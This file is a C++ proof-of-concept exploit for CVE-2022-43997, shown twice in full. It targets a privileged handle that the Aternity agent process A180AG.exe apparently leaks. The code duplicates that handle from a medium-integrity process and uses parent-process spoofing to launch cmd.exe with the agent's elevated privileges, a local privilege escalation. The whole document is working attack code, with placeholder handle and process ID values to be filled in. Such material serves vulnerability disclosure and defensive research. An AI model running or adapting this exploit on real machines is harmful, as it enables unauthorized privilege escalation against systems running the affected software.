jackullrich/CVE-2022-43997.cpp

## CVE-2022-43997.cpp
#include <memory>

#include <Windows.h>

bool CreateProcessWithParent(HANDLE hProcess, PWSTR commandline)
{
	SIZE_T size = 0;
	bool result = false;
	STARTUPINFOEX si = { sizeof(si) };
	PROCESS_INFORMATION pi = { 0 };

	if (InitializeProcThreadAttributeList(nullptr, 1, 0, &size))
	{
		auto buffer = std::make_unique<BYTE[]>(size);

		if (buffer != nullptr)
		{
			auto attributes = reinterpret_cast<PPROC_THREAD_ATTRIBUTE_LIST>(buffer.get());

			if (InitializeProcThreadAttributeList(attributes, 1, 0, &size))
			{
				if (UpdateProcThreadAttribute(attributes, 0,
					PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
					&hProcess, sizeof(hProcess), nullptr, nullptr))
				{
					si.lpAttributeList = attributes;
					result = CreateProcessW(nullptr, commandline, nullptr, nullptr,
						FALSE, EXTENDED_STARTUPINFO_PRESENT, nullptr, nullptr,
						(STARTUPINFO*)&si, &pi);

					if (result)
					{
						CloseHandle(pi.hProcess);
						CloseHandle(pi.hThread);
					}

					CloseHandle(hProcess);
					DeleteProcThreadAttributeList(attributes);
				}
			}
		}
	}

	return result;
}

bool DuplicateAternityHandle(HANDLE hHandleValue, DWORD dwProcessId, PHANDLE hClonedHandle)
{
	bool result = false;

	HANDLE hLocalClone = INVALID_HANDLE_VALUE;
	HANDLE hOwnerProcess = INVALID_HANDLE_VALUE;

	hOwnerProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwProcessId);

	if (hOwnerProcess != nullptr)
	{
		if (DuplicateHandle(hOwnerProcess, hHandleValue, GetCurrentProcess(), &hLocalClone, 0, FALSE, DUPLICATE_SAME_ACCESS))
		{
			result = true;
		}

		CloseHandle(hOwnerProcess);
	}

	*hClonedHandle = hLocalClone;

	return result;
}

int main(void)
{
	//
	// <!--- Replace these values (handle, dwProcessId) --->
	// These can be obtained by calling NtQuerySystemInformation as well
	//
	// This is the A180AG.exe handle value from the medium IL process
	//
	HANDLE handle = INVALID_HANDLE_VALUE;
	//
	// This is the process id of the medium IL process
	//
	DWORD dwProcessId = 123456;

	// Application we want to start
	wchar_t commandLine[1024] = L"C:\\Windows\\System32\\cmd.exe";

	HANDLE hClonedHandle = INVALID_HANDLE_VALUE;

	if (DuplicateAternityHandle(handle, dwProcessId, &hClonedHandle))
	{
		CreateProcessWithParent(hClonedHandle, commandLine);
	}
}
	#include <memory>

	#include <Windows.h>

	bool CreateProcessWithParent(HANDLE hProcess, PWSTR commandline)
	{
	SIZE_T size = 0;
	bool result = false;
	STARTUPINFOEX si = { sizeof(si) };
	PROCESS_INFORMATION pi = { 0 };

	if (InitializeProcThreadAttributeList(nullptr, 1, 0, &size))
	{
	auto buffer = std::make_unique<BYTE[]>(size);

	if (buffer != nullptr)
	{
	auto attributes = reinterpret_cast<PPROC_THREAD_ATTRIBUTE_LIST>(buffer.get());

	if (InitializeProcThreadAttributeList(attributes, 1, 0, &size))
	{
	if (UpdateProcThreadAttribute(attributes, 0,
	PROC_THREAD_ATTRIBUTE_PARENT_PROCESS,
	&hProcess, sizeof(hProcess), nullptr, nullptr))
	{
	si.lpAttributeList = attributes;
	result = CreateProcessW(nullptr, commandline, nullptr, nullptr,
	FALSE, EXTENDED_STARTUPINFO_PRESENT, nullptr, nullptr,
	(STARTUPINFO*)&si, &pi);

	if (result)
	{
	CloseHandle(pi.hProcess);
	CloseHandle(pi.hThread);
	}

	CloseHandle(hProcess);
	DeleteProcThreadAttributeList(attributes);
	}
	}
	}
	}

	return result;
	}

	bool DuplicateAternityHandle(HANDLE hHandleValue, DWORD dwProcessId, PHANDLE hClonedHandle)
	{
	bool result = false;

	HANDLE hLocalClone = INVALID_HANDLE_VALUE;
	HANDLE hOwnerProcess = INVALID_HANDLE_VALUE;

	hOwnerProcess = OpenProcess(PROCESS_DUP_HANDLE, FALSE, dwProcessId);

	if (hOwnerProcess != nullptr)
	{
	if (DuplicateHandle(hOwnerProcess, hHandleValue, GetCurrentProcess(), &hLocalClone, 0, FALSE, DUPLICATE_SAME_ACCESS))
	{
	result = true;
	}

	CloseHandle(hOwnerProcess);
	}

	*hClonedHandle = hLocalClone;

	return result;
	}

	int main(void)
	{
	//
	// <!--- Replace these values (handle, dwProcessId) --->
	// These can be obtained by calling NtQuerySystemInformation as well
	//
	// This is the A180AG.exe handle value from the medium IL process
	//
	HANDLE handle = INVALID_HANDLE_VALUE;
	//
	// This is the process id of the medium IL process
	//
	DWORD dwProcessId = 123456;

	// Application we want to start
	wchar_t commandLine[1024] = L"C:\\Windows\\System32\\cmd.exe";

	HANDLE hClonedHandle = INVALID_HANDLE_VALUE;

	if (DuplicateAternityHandle(handle, dwProcessId, &hClonedHandle))
	{
	CreateProcessWithParent(hClonedHandle, commandLine);
	}
	}